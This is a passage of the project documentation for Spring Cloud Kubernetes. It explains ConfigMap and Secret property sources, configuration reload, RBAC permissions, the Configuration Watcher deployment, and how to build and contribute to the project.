to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\nIf both profiles are active, the property that appears last within the `ConfigMap` overwrites any preceding values.\n\nAnother option is to create a different config map per profile and spring boot will automatically fetch it based\non active profiles\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-development\ndata:\n application.yml: |-\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-production\ndata:\n application.yml: |-\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\n\nTo tell Spring Boot which `profile` should be enabled at bootstrap, you can pass `SPRING_PROFILES_ACTIVE` environment variable.\n To do so, you can launch your Spring Boot application with an environment variable that you can define it in the PodSpec at the container specification.\n Deployment resource file, as follows:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: deployment-name\n labels:\n app: deployment-name\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: deployment-name\n template:\n metadata:\n labels:\n app: deployment-name\n spec:\n containers:\n - name: container-name\n image: your-image\n env:\n - name: SPRING_PROFILES_ACTIVE\n value: \"development\"\n----\n====\n\nNOTE: You should check the security configuration section. To access config maps from inside a pod you need to have the correct\nKubernetes service accounts, roles and role bindings.\n\nAnother option for using `ConfigMap` instances is to mount them into the Pod by running the Spring Cloud Kubernetes application\nand having Spring Cloud Kubernetes read them from the file system.\nThis behavior is controlled by the `spring.cloud.kubernetes.config.paths` property. You can use it in\naddition to or instead of the mechanism described earlier.\nYou can specify multiple (exact) file paths in `spring.cloud.kubernetes.config.paths` by using the `,` delimiter.\n\nNOTE: You have to provide the full exact path to each property file, because directories are not being recursively parsed.\n\nNOTE: If you use `spring.cloud.kubernetes.config.paths` or `spring.cloud.kubernetes.secrets.path` the automatic reload\nfunctionality will not work. You will need to make a `POST` request to the `\/actuator\/refresh` endpoint or\nrestart\/redeploy the application.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.config.enabled` | `Boolean` | `true` | Enable ConfigMaps `PropertySource`\n| `spring.cloud.kubernetes.config.name` | `String` | `${spring.application.name}` | Sets the name of `ConfigMap` to look up\n| `spring.cloud.kubernetes.config.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to lookup\n| `spring.cloud.kubernetes.config.paths` | `List` | `null` | Sets the paths where `ConfigMap` instances are mounted\n| `spring.cloud.kubernetes.config.enableApi` | `Boolean` | `true` | Enable or disable consuming `ConfigMap` instances through APIs\n|===\n\n=== Secrets PropertySource\n\nKubernetes has the notion of https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets] for storing\nsensitive data such as passwords, OAuth tokens, and so on. This project provides integration with `Secrets` to make secrets\naccessible by Spring Boot applications. You can explicitly enable or disable This feature by setting the `spring.cloud.kubernetes.secrets.enabled` property.\n\nWhen enabled, the `Fabric8SecretsPropertySource` looks up Kubernetes for `Secrets` from the following sources:\n\n. Reading recursively from secrets mounts\n. Named after the application (as defined by `spring.application.name`)\n. Matching some labels\n\n*Note:*\n\nBy default, consuming Secrets through the API (points 2 and 3 above) *is not enabled* for security reasons. The permission 'list' on secrets allows clients to inspect secrets values in the specified namespace.\nFurther, we recommend that containers share secrets through mounted volumes.\n\nIf you enable consuming Secrets through the API, we recommend that you limit access to Secrets by using an authorization policy, such as RBAC.\nFor more information about risks and best practices when consuming Secrets through the API refer to https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#best-practices[this doc].\n\nIf the secrets are found, their data is made available to the application.\n\nAssume that we have a spring boot application named `demo` that uses properties to read its database\nconfiguration. We can create a Kubernetes secret by using the following command:\n\n====\n[source]\n----\nkubectl create secret generic db-secret --from-literal=username=user --from-literal=password=p455w0rd\n----\n====\n\nThe preceding command would create the following secret (which you can see by using `kubectl get secrets db-secret -o yaml`):\n\n====\n[source,yaml]\n----\napiVersion: v1\ndata:\n password: cDQ1NXcwcmQ=\n username: dXNlcg==\nkind: Secret\nmetadata:\n creationTimestamp: 2017-07-04T09:15:57Z\n name: db-secret\n namespace: default\n resourceVersion: \"357496\"\n selfLink: \/api\/v1\/namespaces\/default\/secrets\/db-secret\n uid: 63c89263-6099-11e7-b3da-76d6186905a8\ntype: Opaque\n----\n====\n\nNote that the data contains Base64-encoded versions of the literal provided by the `create` command.\n\nYour application can then use this secret -- for example, by exporting the secret's value as environment variables:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Deployment\nmetadata:\n name: ${project.artifactId}\nspec:\n template:\n spec:\n containers:\n - env:\n - name: DB_USERNAME\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: username\n - name: DB_PASSWORD\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: password\n----\n====\n\nYou can select the Secrets to consume in a number of ways:\n\n. By listing the directories where secrets are mapped:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\/db-secret,etc\/secrets\/postgresql\n----\n====\n+\nIf you have all the secrets mapped to a common root, you can set them like:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\n----\n====\n\n. By setting a named secret:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.name=db-secret\n----\n====\n\n. By defining a list of labels:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.labels.broker=activemq\n-Dspring.cloud.kubernetes.secrets.labels.db=postgresql\n----\n====\n\nAs the case with `ConfigMap`, more advanced configuration is also possible where you can use multiple `Secret`\ninstances. The `spring.cloud.kubernetes.secrets.sources` list makes this possible.\nFor example, you could define the following `Secret` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n secrets:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a Secret named s1 in namespace default-namespace\n - name: s1\n # Spring Cloud Kubernetes looks up a Secret named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a Secret named s3 in namespace n3\n - namespace: n3\n name: s3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.secrets.namespace` had not been set,\nthe `Secret` named `s1` would be looked up in the namespace that the application runs.\n\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.secrets.enabled` | `Boolean` | `true` | Enable Secrets `PropertySource`\n| `spring.cloud.kubernetes.secrets.name` | `String` | `${spring.application.name}` | Sets the name of the secret to look up\n| `spring.cloud.kubernetes.secrets.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up\n| `spring.cloud.kubernetes.secrets.labels` | `Map` | `null` | Sets the labels used to lookup secrets\n| `spring.cloud.kubernetes.secrets.paths` | `List` | `null` | Sets the paths where secrets are mounted (example 1)\n| `spring.cloud.kubernetes.secrets.enableApi` | `Boolean` | `false` | Enables or disables consuming secrets through APIs (examples 2 and 3)\n|===\n\nNotes:\n\n* The `spring.cloud.kubernetes.secrets.labels` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#map-based-binding[Map-based binding].\n* The `spring.cloud.kubernetes.secrets.paths` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#collection-based-binding[Collection-based binding].\n* Access to secrets through the API may be restricted for security reasons. The preferred way is to mount secrets to the Pod.\n\nYou can find an example of an application that uses secrets (though it has not been updated to use the new `spring-cloud-kubernetes` project) at\nhttps:\/\/github.com\/fabric8-quickstarts\/spring-boot-camel-config[spring-boot-camel-config]\n\n=== `PropertySource` Reload\n\nWARNING: This functionality has been deprecated in the 2020.0 release. Please see\nthe <<spring-cloud-kubernetes-configuration-watcher>> controller for an alternative way\nto achieve the same functionality.\n\nSome applications may need to detect changes on external property sources and update their internal status to reflect the new configuration.\nThe reload feature of Spring Cloud Kubernetes is able to trigger an application reload when a related `ConfigMap` or\n`Secret` changes.\n\nBy default, this feature is disabled. You can enable it by using the `spring.cloud.kubernetes.reload.enabled=true` configuration property (for example, in the `application.properties` file).\n\nThe following levels of reload are supported (by setting the `spring.cloud.kubernetes.reload.strategy` property):\n\n* `refresh` (default): Only configuration beans annotated with `@ConfigurationProperties` or `@RefreshScope` are reloaded.\nThis reload level leverages the refresh feature of Spring Cloud Context.\n\n* `restart_context`: the whole Spring `ApplicationContext` is gracefully restarted. Beans are recreated with the new configuration.\nIn order for the restart context functionality to work properly you must enable and expose the restart actuator endpoint\n[source,yaml]\n====\n----\nmanagement:\n endpoint:\n restart:\n enabled: true\n endpoints:\n web:\n exposure:\n include: restart\n----\n====\n\n* `shutdown`: the Spring `ApplicationContext` is shut down to activate a restart of the container.\n When you use this level, make sure that the lifecycle of all non-daemon threads is bound to the `ApplicationContext`\nand that a replication controller or replica set is configured to restart the pod.\n\nAssuming that the reload feature is enabled with default settings (`refresh` mode), the following bean is refreshed when the config map changes:\n\n====\n[java, source]\n----\n@Configuration\n@ConfigurationProperties(prefix = \"bean\")\npublic class MyConfig {\n\n private String message = \"a message that can be changed live\";\n\n \/\/ getter and setters\n\n}\n----\n====\n\nTo see that changes effectively happen, you can create another bean that prints the message periodically, as follows\n\n====\n[source,java]\n----\n@Component\npublic class MyBean {\n\n @Autowired\n private MyConfig config;\n\n @Scheduled(fixedDelay = 5000)\n public void hello() {\n System.out.println(\"The message is: \" + config.getMessage());\n }\n}\n----\n====\n\nYou can change the message printed by the application by using a `ConfigMap`, as follows:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: reload-example\ndata:\n application.properties: |-\n bean.message=Hello World!\n----\n====\n\nAny change to the property named `bean.message` in the `ConfigMap` associated with the pod is reflected in the\noutput. More generally speaking, changes associated to properties prefixed with the value defined by the `prefix`\nfield of the `@ConfigurationProperties` annotation are detected and reflected in the application.\n<<configmap-propertysource,Associating a `ConfigMap` with a pod>> is explained earlier in this chapter.\n\nThe full example is available in https:\/\/github.com\/fabric8io\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples\/kubernetes-reload-example[`spring-cloud-kubernetes-reload-example`].\n\nThe reload feature supports two operating modes:\n* Event (default): Watches for changes in config maps or secrets by using the Kubernetes API (web socket).\nAny event produces a re-check on the configuration and, in case of changes, a reload.\nThe `view` role on the service account is required in order to listen for config map changes. A higher level role (such as `edit`) is required for secrets\n(by default, secrets are not monitored).\n* Polling: Periodically re-creates the configuration from config maps and secrets to see if it has changed.\nYou can configure the polling period by using the `spring.cloud.kubernetes.reload.period` property and defaults to 15 seconds.\nIt requires the same role as the monitored property source.\nThis means, for example, that using polling on file-mounted secret sources does not require particular privileges.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.reload.enabled` | `Boolean` | `false` | Enables monitoring of property sources and configuration reload\n| `spring.cloud.kubernetes.reload.monitoring-config-maps` | `Boolean` | `true` | Allow monitoring changes in config maps\n| `spring.cloud.kubernetes.reload.monitoring-secrets` | `Boolean` | `false` | Allow monitoring changes in secrets\n| `spring.cloud.kubernetes.reload.strategy` | `Enum` | `refresh` | The strategy to use when firing a reload (`refresh`, `restart_context`, or `shutdown`)\n| `spring.cloud.kubernetes.reload.mode` | `Enum` | `event` | Specifies how to listen for changes in property sources (`event` or `polling`)\n| `spring.cloud.kubernetes.reload.period` | `Duration`| `15s` | The period for verifying changes when using the `polling` strategy\n|===\n\nNotes:\n* You should not use properties under `spring.cloud.kubernetes.reload` in config maps or secrets. Changing such properties at runtime may lead to unexpected results.\n* Deleting a property or the whole config map does not restore the original state of the beans when you use the `refresh` level.\n\n== Kubernetes Ecosystem Awareness\n\nAll of the features described earlier in this guide work equally well, regardless of whether your application is running inside\nKubernetes. This is really helpful for development and troubleshooting.\nFrom a development point of view, this lets you start your Spring Boot application and debug one\nof the modules that is part of this project. You need not deploy it in Kubernetes,\nas the code of the project relies on the\nhttps:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java client], which is a fluent DSL that can\ncommunicate by using `http` protocol to the REST API of the Kubernetes Server.\n\nTo disable the integration with Kubernetes you can set `spring.cloud.kubernetes.enabled` to `false`. Please be aware that when `spring-cloud-kubernetes-config` is on the classpath,\n`spring.cloud.kubernetes.enabled` should be set in `bootstrap.{properties|yml}` (or the profile specific one) otherwise it should be in `application.{properties|yml}` (or the profile specific one).\nAlso note that these properties: `spring.cloud.kubernetes.config.enabled` and `spring.cloud.kubernetes.secrets.enabled` only take effect when set in `bootstrap.{properties|yml}`\n\n=== Kubernetes Profile Autoconfiguration\n\nWhen the application runs as a pod inside Kubernetes, a Spring profile named `kubernetes` automatically gets activated.\nThis lets you customize the configuration, to define beans that are applied when the Spring Boot application is deployed\nwithin the Kubernetes platform (for example, different development and production configuration).\n\n=== Istio Awareness\n\nWhen you include the `spring-cloud-kubernetes-istio` module in the application classpath, a new profile is added to the application,\nprovided the application is running inside a Kubernetes Cluster with https:\/\/istio.io[Istio] installed. You can then use\nspring `@Profile(\"istio\")` annotations in your Beans and `@Configuration` classes.\n\nThe Istio awareness module uses `me.snowdrop:istio-client` to interact with Istio APIs, letting us discover traffic rules, circuit breakers, and so on,\nmaking it easy for our Spring Boot applications to consume this data to dynamically configure themselves according to the environment.\n\n== Pod Health Indicator\n\nSpring Boot uses https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-project\/spring-boot-actuator\/src\/main\/java\/org\/springframework\/boot\/actuate\/health\/HealthEndpoint.java[`HealthIndicator`] to expose info about the health of an application.\nThat makes it really useful for exposing health-related information to the user and makes it a good fit for use as https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[readiness probes].\n\nThe Kubernetes health indicator (which is part of the core module) exposes the following info:\n\n* Pod name, IP address, namespace, service account, node name, and its IP address\n* A flag that indicates whether the Spring Boot application is internal or external to Kubernetes\n\n== Info Contributor\n\nSpring Cloud Kubernetes includes an `InfoContributor` which adds Pod information to\nSpring Boot's `\/info` Acturator endpoint.\n\nYou can disable this `InfoContributor` by setting `management.info.kubernetes.enabled`\nto `false` in `bootstrap.[properties | yaml]`.\n\n== Leader Election\n\n<TBD>\n\n== LoadBalancer for Kubernetes\nThis project includes Spring Cloud Load Balancer for load balancing based on Kubernetes Endpoints and provides implementation of load balancer based on Kubernetes Service.\nTo include it to your project add the following dependency.\n====\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable load balancing based on Kubernetes Service name use the following property. Then load balancer would try to call application using address, for example `service-a.default.svc.cluster.local`\n====\n[source]\n----\nspring.cloud.kubernetes.loadbalancer.mode=SERVICE\n----\n====\n\nTo enabled load balancing across all namespaces use the following property. Property from `spring-cloud-kubernetes-discovery` module is respected.\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\n== Security Configurations Inside Kubernetes\n\n\n=== Namespace\n\nMost of the components provided in this project need to know the namespace. For Kubernetes (1.3+), the namespace is made available to the pod as part of the service account secret and is automatically detected by the client.\nFor earlier versions, it needs to be specified as an environment variable to the pod. A quick way to do this is as follows:\n\n====\n[source]\n----\n env:\n - name: \"KUBERNETES_NAMESPACE\"\n valueFrom:\n fieldRef:\n fieldPath: \"metadata.namespace\"\n----\n====\n\n=== Service Account\n\nFor distributions of Kubernetes that support more fine-grained role-based access within the cluster, you need to make sure a pod that runs with `spring-cloud-kubernetes` has access to the Kubernetes API.\nFor any service accounts you assign to a deployment or pod, you need to make sure they have the correct roles.\n\nDepending on the requirements, you'll need `get`, `list` and `watch` permission on the following resources:\n\n.Kubernetes Resource Permissions\n|===\n|Dependency | Resources\n\n\n|spring-cloud-starter-kubernetes\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-config\n|configmaps, secrets\n|===\n\nFor development purposes, you can add `cluster-reader` permissions to your `default` service account. On a production system you'll likely want to provide more granular permissions.\n\nThe following Role and RoleBinding are an example for namespaced permissions for the `default` account:\n\n====\n[source,yaml]\n----\nkind: Role\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n namespace: YOUR-NAME-SPACE\n name: namespace-reader\nrules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n\n---\n\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n name: namespace-reader-binding\n namespace: YOUR-NAME-SPACE\nsubjects:\n- kind: ServiceAccount\n name: default\n apiGroup: \"\"\nroleRef:\n kind: Role\n name: namespace-reader\n apiGroup: \"\"\n----\n====\n\n== Service Registry Implementation\n\nIn Kubernetes service registration is controlled by the platform, the application itself does not control\nregistration as it may do in other platforms. For this reason using `spring.cloud.service-registry.auto-registration.enabled`\nor setting `@EnableDiscoveryClient(autoRegister=false)` will have no effect in Spring Cloud Kubernetes.\n\n[#spring-cloud-kubernetes-configuration-watcher]\n## Spring Cloud Kubernetes Configuration Watcher\n\nKubernetes provides the ability to https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#add-configmap-data-to-a-volume[mount a ConfigMap or Secret as a volume]\nin the container of your application. When the contents of the ConfigMap or Secret changes, the https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#mounted-configmaps-are-updated-automatically[mounted volume will be updated with those changes].\n\nHowever, Spring Boot will not automatically update those changes unless you restart the application. Spring Cloud\nprovides the ability refresh the application context without restarting the application by either hitting the\nactuator endpoint `\/refresh` or via publishing a `RefreshRemoteApplicationEvent` using Spring Cloud Bus.\n\nTo achieve this configuration refresh of a Spring Cloud app running on Kubernetes, you can deploy the Spring Cloud\nKubernetes Configuration Watcher controller into your Kubernetes cluster.\n\nThe application is published as a container and is available on https:\/\/hub.docker.com\/repository\/docker\/springcloud\/spring-cloud-kubernetes-configuration-watcher[Docker Hub].\n\nSpring Cloud Kubernetes Configuration Watcher can send refresh notifications to applications in two ways.\n\n1. Over HTTP in which case the application being notified must of the `\/refresh` actuator endpoint exposed and accessible from within the cluster\n2. Using Spring Cloud Bus, in which case you will need a message broker deployed to your custer for the application to use.\n\n### Deployment YAML\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configuration-watcher\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configuration-watcher-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configuration-watcher\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n spec:\n serviceAccount: spring-cloud-kubernetes-configuration-watcher\n containers:\n - name: spring-cloud-kubernetes-configuration-watcher\n image: springcloud\/spring-cloud-kubernetes-configuration-watcher:2.0.0-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\nThe Service Account and associated Role Binding is important for Spring Cloud Kubernetes Configuration to work properly.\nThe controller needs access to read data about ConfigMaps, Pods, Services, Endpoints and Secrets in the Kubernetes cluster.\n\n### Monitoring ConfigMaps and Secrets\n\nSpring Cloud Kubernetes Configuration Watcher will react to changes in ConfigMaps with a label of `spring.cloud.kubernetes.config` with the value `true`\nor any Secret with a label of `spring.cloud.kubernetes.secret` with the value `true`. If the ConfigMap or Secret does not have either of those labels\nor the values of those labels is not `true` then any changes will be ignored.\n\nThe labels Spring Cloud Kubernetes Configuration Watcher looks for on ConfigMaps and Secrets can be changed by setting\n`spring.cloud.kubernetes.configuration.watcher.configLabel` and `spring.cloud.kubernetes.configuration.watcher.secretLabel` respectively.\n\nIf a change is made to a ConfigMap or Secret with valid labels then Spring Cloud Kubernetes Configuration Watcher will take the name of the ConfigMap or Secret\nand send a notification to the application with that name.\n\n### HTTP Implementation\n\nThe HTTP implementation is what is used by default. When this implementation is used Spring Cloud Kubernetes Configuration Watcher and a\nchange to a ConfigMap or Secret occurs then the HTTP implementation will use the Spring Cloud Kubernetes Discovery Client to fetch all\ninstances of the application which match the name of the ConfigMap or Secret and send an HTTP POST request to the application's actuator\n`\/refresh` endpoint. By default it will send the post request to `\/actuator\/refresh` using the port registered in the discovery client.\n\n#### Non-Default Management Port and Actuator Path\n\nIf the application is using a non-default actuator path and\/or using a different port for the management endpoints, the Kubernetes service for the application\ncan add an annotation called `boot.spring.io\/actuator` and set its value to the path and port used by the application. For example\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n labels:\n app: config-map-demo\n name: config-map-demo\n annotations:\n boot.spring.io\/actuator: http:\/\/:9090\/myactuator\/home\nspec:\n ports:\n - name: http\n port: 8080\n targetPort: 8080\n selector:\n app: config-map-demo\n----\n====\n\n\nAnother way you can choose to configure the actuator path and\/or management port is by setting\n`spring.cloud.kubernetes.configuration.watcher.actuatorPath` and `spring.cloud.kubernetes.configuration.watcher.actuatorPort`.\n\n### Messaging Implementation\n\nThe messaging implementation can be enabled by setting profile to either `bus-amqp` (RabbitMQ) or `bus-kafka` (Kafka) when the Spring Cloud Kubernetes Configuration Watcher\napplication is deployed to Kubernetes.\n\n### Configuring RabbitMQ\n\nWhen the `bus-amqp` profile is enabled you will need to configure Spring RabbitMQ to point it to the location of the RabbitMQ\ninstance you would like to use as well as any credentials necessary to authenticate. This can be done\nby setting the standard Spring RabbitMQ properties, for example\n\n====\n[source,yaml]\n----\nspring:\n rabbitmq:\n username: user\n password: password\n host: rabbitmq\n----\n====\n\n### Configuring Kafka\n\nWhen the `bus-kafka` profile is enabled you will need to configure Spring Kafka to point it to the location of the Kafka Broker\ninstance you would like to use. This can be done by setting the standard Spring Kafka properties, for example\n\n====\n[source,yaml]\n----\nspring:\n kafka:\n producer:\n bootstrap-servers: localhost:9092\n----\n====\n\n== Examples\n\nSpring Cloud Kubernetes tries to make it transparent for your applications to consume Kubernetes Native Services by\nfollowing the Spring Cloud interfaces.\n\nIn your applications, you need to add the `spring-cloud-kubernetes-discovery` dependency to your classpath and remove any other dependency that contains a `DiscoveryClient` implementation (that is, a Eureka discovery client).\nThe same applies for `PropertySourceLocator`, where you need to add to the classpath the `spring-cloud-kubernetes-config` and remove any other dependency that contains a `PropertySourceLocator` implementation (that is, a configuration server client).\n\nThe following projects highlight the usage of these dependencies and demonstrate how you can use these libraries from any Spring Boot application:\n\n* https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples[Spring Cloud Kubernetes Examples]: the ones located inside this repository.\n* Spring Cloud Kubernetes Full Example: Minions and Boss\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-minion[Minion]\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-boss[Boss]\n* Spring Cloud Kubernetes Full Example: https:\/\/github.com\/salaboy\/s1p_docs[SpringOne Platform Tickets Service]\n* https:\/\/github.com\/salaboy\/s1p_gateway[Spring Cloud Gateway with Spring Cloud Kubernetes Discovery and Config]\n* https:\/\/github.com\/salaboy\/showcase-admin-tool[Spring Boot Admin with Spring Cloud Kubernetes Discovery and Config]\n\n== Other Resources\n\nThis section lists other resources, such as presentations (slides) and videos about Spring Cloud Kubernetes.\n\n* https:\/\/salaboy.com\/2018\/09\/27\/the-s1p-experience\/[S1P Spring Cloud on PKS]\n* https:\/\/salaboy.com\/2018\/07\/18\/ljc-july-18-spring-cloud-docker-k8s\/[Spring Cloud, Docker, Kubernetes -> London Java Community July 2018]\n\n\nPlease feel free to submit other resources through pull requests to https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes[this repository].\n\n== Configuration properties\n\nTo see the list of all Kubernetes related configuration properties please check link:appendix.html[the Appendix page].\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttps:\/\/docs.docker.com\/compose\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttps:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttps:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttps:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Activate the Spring Maven profile\nSpring Cloud projects require the 'spring' Maven profile to be activated to resolve\nthe spring milestone and snapshot repositories. Use your preferred IDE to set this\nprofile to be active, or you may experience build errors.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the https:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\n:spring-cloud-build-branch: master\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/cla.pivotal.io\/sign\/spring[Contributor License Agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are 